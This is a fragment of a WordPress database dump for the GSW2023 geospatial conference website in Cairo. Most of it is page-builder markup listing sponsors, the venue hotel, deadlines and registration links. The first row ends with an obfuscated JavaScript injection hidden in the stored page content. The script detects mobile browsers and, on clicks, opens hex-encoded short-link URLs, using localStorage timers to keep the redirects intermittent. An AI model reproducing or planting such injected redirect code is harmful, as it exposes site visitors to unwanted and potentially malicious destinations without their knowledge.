'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 04:50:13','2023-05-17 04:50:13','',3066,'https://gsw2023.com/?p=4516',0,'revision','',0),
(4517,1,'2023-05-17 04:51:30','2023-05-17 04:51:30','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\" css=\".vc_custom_1684297727133{margin-top: 25px !important;}\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h3>[vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner]</h3>\r\n<h3>[vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo 